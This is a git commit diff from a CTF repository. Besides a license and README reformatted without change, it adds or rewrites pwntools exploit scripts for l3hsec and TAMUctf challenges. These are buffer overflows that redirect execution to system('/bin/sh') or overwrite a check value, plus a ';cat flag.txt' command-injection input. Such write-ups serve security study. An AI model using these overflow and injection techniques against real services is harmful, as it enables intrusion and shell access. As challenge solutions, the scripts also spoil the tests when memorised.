Sun, 24 Feb 2019 22:31:06 +0800

7 years ago · 7728c15b1a
parent b75b6bd464
commit 7728c15b1a
11 changed files with 978 additions and 962 deletions
--- a/.gitignore
+++ b/.gitignore
--- a/28
+++ b/28
@ -1,14 +1,14 @@
-DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
-
-Version 2, December 2004
-
-Copyright (C) 2004 Sam Hocevar <sam@hocevar.net>
-
-Everyone is permitted to copy and distribute verbatim or modified copies of
-this license document, and changing it is allowed as long as the name is changed.
-
-DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
-
-TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
-   0. You just DO WHAT THE FUCK YOU WANT TO.
+DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
+
+Version 2, December 2004
+
+Copyright (C) 2004 Sam Hocevar <sam@hocevar.net>
+
+Everyone is permitted to copy and distribute verbatim or modified copies of
+this license document, and changing it is allowed as long as the name is changed.
+
+DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
+
+TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+   0. You just DO WHAT THE FUCK YOU WANT TO.
--- a/README.md
+++ b/README.md
@ -1,2 +1,2 @@
-# ctf
-
+# ctf
+
--- a/l3hsec-writeup/README.md
+++ b/l3hsec-writeup/README.md
@ -1,13 +1,13 @@
-### stack
-
-用ida一看，找到字符串和ebp差`0x3a`，然后发现在`0x080491E2`有`system("/bin/sh")`。没了。
-
-```python
-from pwn import *
-pld = 'A' * (0x3a + 4) + p32(0x080491E2)
-p = remote("159.65.68.241", 10003)
-p.sendline(pld)
-p.interactive()
-```
-
-> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}`
+### stack
+
+用ida一看，找到字符串和ebp差`0x3a`，然后发现在`0x080491E2`有`system("/bin/sh")`。没了。
+
+```python
+from pwn import *
+pld = 'A' * (0x3a + 4) + p32(0x080491E2)
+p = remote("159.65.68.241", 10003)
+p.sendline(pld)
+p.interactive()
+```
+
+> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}`
--- a/l3hsec-writeup/stack.py
+++ b/l3hsec-writeup/stack.py
@ -1,5 +1,5 @@
-from pwn import *
-pld = 'A' * (0x3a + 4) + p32(0x080491E2)
-p = remote("159.65.68.241", 10003)
-p.sendline(pld)
+from pwn import *
+pld = 'A' * (0x3a + 4) + p32(0x080491E2)
+p = remote("159.65.68.241", 10003)
+p.sendline(pld)
 p.interactive()
--- a/tamu-writeup/pwn1
+++ b/tamu-writeup/pwn1
--- a/tamu-writeup/pwn1wp.py
+++ b/tamu-writeup/pwn1wp.py
@ -0,0 +1,7 @@
+from pwn import *
+sh = remote("pwn.tamuctf.com", 4321)
+sh.sendline("Sir Lancelot of Camelot")
+sh.sendline("To seek the Holy Grail.")
+pld = 'a' * 43 + p32(0xDEA110C8)
+sh.sendline(pld)
+sh.interactive()
--- a/tamu-writeup/pwn2
+++ b/tamu-writeup/pwn2
--- a/tamu-writeup/pwn2wp.py
+++ b/tamu-writeup/pwn2wp.py
@ -0,0 +1,5 @@
+from pwn import *
+sh = remote("pwn.tamuctf.com", 4322)
+pld = 'a' * +30 + p8(0xd8)
+sh.sendline(pld)
+sh.interactive()
--- a/tamu-writeup/pwn4
+++ b/tamu-writeup/pwn4
--- a/tamu-writeup/pwn4wp.py
+++ b/tamu-writeup/pwn4wp.py
@ -0,0 +1,4 @@
+from pwn import *
+sh = remote("pwn.tamuctf.com", 4324)
+sh.sendline(";cat flag.txt")
+sh.interactive()